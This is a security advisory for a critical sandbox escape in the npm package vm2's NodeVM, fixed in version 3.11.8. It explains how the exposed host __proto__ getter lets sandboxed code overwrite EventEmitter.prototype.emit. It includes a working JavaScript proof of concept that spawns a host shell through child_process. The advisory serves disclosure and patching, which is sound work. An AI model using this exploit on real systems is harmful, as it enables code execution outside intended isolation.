GHSA-88hf-g992-jg85

Suggest an improvement
Source
https://github.com/advisories/GHSA-88hf-g992-jg85
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-88hf-g992-jg85/GHSA-88hf-g992-jg85.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-88hf-g992-jg85
Aliases
Published
2026-10-05T22:47:09Z
Modified
2026-10-05T23:00:04Z
Severity
  • 10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
  • 10.0 (Critical) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H CVSS Calculator
Summary
vm2: Sandbox Escape (NodeVM)
Details

Summary

It being possible to obtain the host __proto__ getter/setter, has been used in many reports:

Yet it was never patched...


This can, still, be used to escape the sandbox, one example (I'm sure there's other ways as well), is via console._stdout/console._stderr (NodeVM with console: 'inherit', which is the default)

Details

The prototype chain for console._stdout/console._stderr is:

_stdout / _stderr
-> WriteStream (TTY only)
-> Socket
-> Duplex
-> Readable
-> Stream
-> EventEmitter

process is an EventEmitter, and nothing stops us from writing things to EventEmmiter.prototype

By overwriting EventEmmiter.prototype.emit with a function, and making process emit an event (e.g. exit, unhandledRejection etc.), we can execute code with this being process.

This also bypasses --disallow-code-generation-from-strings, which blocks the "usual" escape of obtaining the host function constructor.

PoC

const { NodeVM } = require("vm2");

code = `
const gP = Buffer.call.call(__lookupGetter__,67,'__proto__');

// vm __proto__ getter
console.log(__lookupGetter__.call(0,'__proto__').call(console._stderr)); // [Object: null prototype] {}

// host __proto__ getter
console.log(gP.call(console._stderr)); // Socket { [...] }

let p = console._stdout;
while (p.pipe) {
	console.log(p.constructor.name);
	p = gP.call(p);
};

p.emit = function(){
	console.log(this+[]);
	this.getBuiltinModule("child_process").execSync("sh",{stdio:"inherit"})
}
`;

const vm = new NodeVM();
vm.run(code);
Database specific
{
    "cwe_ids":  [
        "CWE-913"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-10-05T22:47:09Z",
    "nvd_published_at":  null,
    "severity":  "CRITICAL"
}
References

Affected packages

npm / vm2

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
3.11.8

Database specific

last_known_affected_version_range
"<= 3.11.7"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-88hf-g992-jg85/GHSA-88hf-g992-jg85.json"